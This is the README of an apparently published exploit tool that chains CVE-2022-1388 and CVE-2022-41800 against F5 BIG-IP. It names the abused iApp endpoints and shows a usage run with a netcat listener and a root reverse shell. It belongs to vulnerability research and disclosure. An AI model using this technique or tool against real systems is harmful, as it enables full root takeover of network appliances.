# Tippa My Tongue

Tippa My Tongue is an exploit that uses CVE-2022-1388 and CVE-2022-41800 to establish a `root` reverse shell on F5 BIG-IP products. Most CVE-2022-1388 exploits achieve code execution using `/mgmt/tm/util/bash`. However, this exploit uses `/mgmt/shared/iapp/rpm-spec-creator`, followed by `/mgmt/shared/iapp/build-package`. This approach was first suggested by [Ron Bowes]( in this AttackerKB [analysis]( Although, to my knowledge, no one ever published a CVE-2022-1388 exploit that did just that.

For more details, read the [VulnCheck]( writeup.

## Usage Example:

albinolobster@mournland:~/tippa-my-tongue$ python3 --rhost --lhost

   โ–„โ–„โ–„โ–„โ–„โ–ช   โ–„โ–„โ–„ยท โ–„โ–„โ–„ยท โ–„โ–„โ–„ยท     โ€ข โ–Œ โ–„ ยท.  โ–„ยท โ–„
   โ€ขโ–ˆโ–ˆ  โ–ˆโ–ˆ โ–โ–ˆ โ–„โ–ˆโ–โ–ˆ โ–„โ–ˆโ–โ–ˆ โ–€โ–ˆ     ยทโ–ˆโ–ˆ โ–โ–ˆโ–ˆโ–ˆโ–ชโ–โ–ˆโ–ชโ–ˆโ–ˆ
    โ–โ–ˆ.โ–ชโ–โ–ˆยท โ–ˆโ–ˆโ–€ยท โ–ˆโ–ˆโ–€ยทโ–„โ–ˆโ–€โ–€โ–ˆ     โ–โ–ˆ โ–Œโ–โ–Œโ–โ–ˆยทโ–โ–ˆโ–Œโ–โ–ˆโ–ช
    โ–โ–ˆโ–Œยทโ–โ–ˆโ–Œโ–โ–ˆโ–ชยทโ€ขโ–โ–ˆโ–ชยทโ€ขโ–โ–ˆ โ–ชโ–โ–Œ    โ–ˆโ–ˆ โ–ˆโ–ˆโ–Œโ–โ–ˆโ–Œ โ–โ–ˆโ–€ยท.
    โ–€โ–€โ–€ โ–€โ–€โ–€.โ–€   .โ–€    โ–€  โ–€     โ–€โ–€  โ–ˆโ–ชโ–€โ–€โ–€  โ–€ โ€ข
         โ–„โ–„โ–„โ–„โ–„       โ– โ–„  โ–„โ–„ โ€ข โ–„โ€ข โ–„โ–Œโ–„โ–„โ–„ .
         โ€ขโ–ˆโ–ˆ  โ–ช     โ€ขโ–ˆโ–Œโ–โ–ˆโ–โ–ˆ โ–€ โ–ชโ–ˆโ–ชโ–ˆโ–ˆโ–Œโ–€โ–„.โ–€ยท
          โ–โ–ˆ.โ–ช โ–„โ–ˆโ–€โ–„ โ–โ–ˆโ–โ–โ–Œโ–„โ–ˆ โ–€โ–ˆโ–„โ–ˆโ–Œโ–โ–ˆโ–Œโ–โ–€โ–€โ–ชโ–„
          โ–€โ–€โ–€  โ–€โ–ˆโ–„โ–€โ–ชโ–€โ–€ โ–ˆโ–ชยทโ–€โ–€โ–€โ–€  โ–€โ–€โ–€  โ–€โ–€โ–€



[+] Executing netcat listener
[+] Using /usr/bin/nc
Listening on 1270
[+] Sending initial request to rpm-spec-creator
[+] Sending exploit attempt request to build-package
Connection received on 47152
bash: no job control in this shell
[@localhost:NO LICENSE:Standalone] BUILD # pwd
[@localhost:NO LICENSE:Standalone] BUILD # id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[@localhost:NO LICENSE:Standalone] BUILD #

## Acknowledgements

* Ron Bowes: for discovering these endpoints and sharing them with the world
* [RHCP]( for being funky